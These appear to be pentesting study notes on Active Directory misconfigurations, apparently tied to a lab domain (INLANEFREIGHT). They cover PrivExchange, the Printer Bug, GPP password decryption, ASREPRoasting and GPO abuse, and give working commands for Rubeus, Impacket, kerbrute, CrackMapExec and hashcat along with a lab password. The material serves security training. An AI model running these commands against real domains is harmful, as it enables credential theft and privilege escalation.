Keyboard shortcuts

Press or to navigate between chapters

Press S or / to search in the book

Press ? to show this help

Press Esc to hide this help

🏠 Back to Blog

Miscellaneous Misconfigurations

A collection of commonly overlooked AD misconfigurations that can provide initial footholds, credential harvesting, or privilege escalation opportunities.

Default Exchange installations grant excessive privileges within the domain.

Exchange Windows Permissions

  • Not listed as a protected group, but members can write a DACL to the domain object
  • Can be leveraged to grant DCSync privileges
  • Attackers can add accounts via DACL misconfiguration or through a compromised Account Operators member
  • Common to find users and even computer accounts as members

Organization Management

  • Effectively the “Domain Admins” of Exchange — can access all domain user mailboxes
  • Has full control over the OU Microsoft Exchange Security Groups (which contains Exchange Windows Permissions)
  • Sysadmins are frequently members

PrivExchange

Flaw in the Exchange Server PushSubscription feature — any domain user with a mailbox can force Exchange to authenticate to any host over HTTP. Exchange runs as SYSTEM with WriteDacl on the domain (pre-2019 CU). Relay to LDAP to dump NTDS or relay to other hosts. Results in Domain Admin from any authenticated domain user.

Credential Harvesting

Compromising an Exchange server often yields 10s–100s of cleartext credentials or NTLM hashes from users logging into OWA.

Printer Bug (MS-RPRN)

Flaw in the Print System Remote Protocol (MS-RPRN). Any domain user can connect to the spool’s named pipe via RpcOpenPrinter and use RpcRemoteFindFirstPrinterChangeNotificationEx to force the server to authenticate to any host over SMB.

The spooler service runs as SYSTEM and is installed by default on Windows servers with Desktop Experience.

Attack Uses

  • Relay to LDAP to grant DCSync privileges
  • Relay to grant Resource-Based Constrained Delegation (RBCD) to a controlled computer account
  • Compromise a DC in a partner domain/forest (if trust allows TGT delegation and unconstrained delegation is enabled)

Enumeration

Import-Module .\SecurityAssessment.ps1
Get-SpoolStatus -ComputerName ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL

MS14-068 (Kerberos PAC Validation)

Flaw in Kerberos allowing a forged PAC to be accepted by the KDC. Standard domain user credentials can be escalated to Domain Admin by presenting the user as a member of Domain Admins in a crafted PAC.

Tools: PyKEK (Python Kerberos Exploitation Kit), Impacket

Defense: Patching (MS14-068). See HTB box “Mantis” for a practical example.

Sniffing LDAP Credentials

Many applications and printers store LDAP credentials in their web admin consoles (often with weak/default passwords). Two approaches:

  1. View in cleartext if the admin console exposes the password
  2. Redirect the test connection — change the LDAP server IP to the attack host and listen with netcat on port 389. The device sends credentials (often cleartext) during the connection test

LDAP service accounts are frequently privileged. Even if not, they provide a domain foothold.

Enumerating DNS Records

adidnsdump enumerates all DNS records in a domain via LDAP. By default, all users can list child objects of a DNS zone, but standard LDAP queries don’t return all results — this tool resolves that gap.

Useful when host naming conventions are non-descriptive (e.g., SRV01934) — DNS records may reveal meaningful names like JENKINS.INLANEFREIGHT.LOCAL.

Usage

adidnsdump -u inlanefreight\\forend ldap://172.16.5.5
head records.csv

# Resolve unknown records
adidnsdump -u inlanefreight\\forend ldap://172.16.5.5 -r
head records.csv

Password in Description Field

Account passwords are sometimes stored in the user Description or Notes field.

Get-DomainUser * | Select-Object samaccountname,description | Where-Object {$_.Description -ne $null}

PASSWD_NOTREQD Flag

Accounts with PASSWD_NOTREQD in userAccountControl are exempt from the domain password policy length requirement. They may have a short password, or no password at all if empty passwords are allowed.

This flag is often set by vendor installers and never removed. Always enumerate and test these accounts, and report the finding regardless.

Get-DomainUser -UACFilter PASSWD_NOTREQD | Select-Object samaccountname,useraccountcontrol

Credentials in SMB Shares and SYSVOL Scripts

The SYSVOL share’s scripts directory is readable by all authenticated users. Hunt for passwords in batch, VBScript, and PowerShell scripts.

ls \\academy-ea-dc01\SYSVOL\INLANEFREIGHT.LOCAL\scripts

Found passwords (e.g., local admin credentials in reset_local_admin_pass.vbs) can be sprayed across the domain using CrackMapExec with --local-auth.

Group Policy Preferences (GPP) Passwords

GPP XML files in SYSVOL (drives.xml, printers.xml, services.xml, scheduledtasks.xml, Groups.xml) can contain the cpassword attribute — AES-256 encrypted, but Microsoft published the private key, so any domain user can decrypt it.

Patched in 2014 (MS14-025), but existing files are not removed. Cached copies on local machines persist even if the GPP policy is deleted (rather than unlinked).

Decrypting

gpp-decrypt VPe/o9YRyz2cksnYRbNeQj35w9KxQ5ttbvtRaAVqxaE

Automated Discovery

# List available CrackMapExec GPP modules
crackmapexec smb -L | grep gpp

# Find autologon credentials in Registry.xml
crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 -M gpp_autologin

Other tools: Get-GPPPassword.ps1, Get-GPPAutologon.ps1 (PowerSploit), GPP Metasploit Post Module.

GPP passwords often belong to legacy/disabled accounts, but always try password spraying with recovered passwords — password reuse is common.

ASREPRoasting

Targets accounts with Do not require Kerberos pre-authentication enabled. Without pre-auth, any user can request an AS-REP encrypted with the target account’s password and crack it offline.

No SPN is required (unlike Kerberoasting). If you have GenericWrite/GenericAll over an account, you can enable this attribute, retrieve the hash, then disable it again.

Enumeration (Windows)

Get-DomainUser -PreauthNotRequired | select samaccountname,userprincipalname,useraccountcontrol | fl

Attack (Windows — Rubeus)

.\Rubeus.exe asreproast /user:mmorgan /nowrap /format:hashcat

Attack (Linux — Impacket)

GetNPUsers.py INLANEFREIGHT.LOCAL/ -dc-ip 172.16.5.5 -no-pass -usersfile valid_ad_users

Attack (Linux — Kerbrute)

Kerbrute automatically retrieves the AS-REP for users without pre-auth during user enumeration:

kerbrute userenum -d inlanefreight.local --dc 172.16.5.5 /opt/jsmith.txt

Cracking

hashcat -m 18200 ilfreight_asrep /usr/share/wordlists/rockyou.txt

Even if you can’t crack the hash, report the finding — the misconfiguration itself is worth documenting.

GPO Abuse

If a user/group has write rights over a GPO (WriteProperty, WriteDacl, WriteOwner), they can modify it for:

  • Adding privileges to a user (SeDebugPrivilege, SeTakeOwnershipPrivilege, SeImpersonatePrivilege)
  • Adding a local admin user to affected hosts
  • Creating an immediate scheduled task for code execution

Enumeration

# List all GPOs
Get-DomainGPO | select displayname

# Built-in cmdlet
Get-GPO -All | Select DisplayName

# Check if Domain Users have rights over any GPO
$sid = Convert-NameToSid "Domain Users"
Get-DomainGPO | Get-ObjectAcl | ? {$_.SecurityIdentifier -eq $sid}

# Resolve GPO GUID to name
Get-GPO -Guid 7CA9C789-14CE-46E3-A722-83F4097AF532

Use BloodHound to visualize GPO relationships and identify affected OUs/computers.

Exploitation

Use SharpGPOAbuse to leverage writable GPOs. Be careful — GPO changes affect all computers in the linked OU. Prefer targeting specific users/hosts when the tool supports it.

Audit Tools

group3r, ADRecon, PingCastle — all can audit GPO security.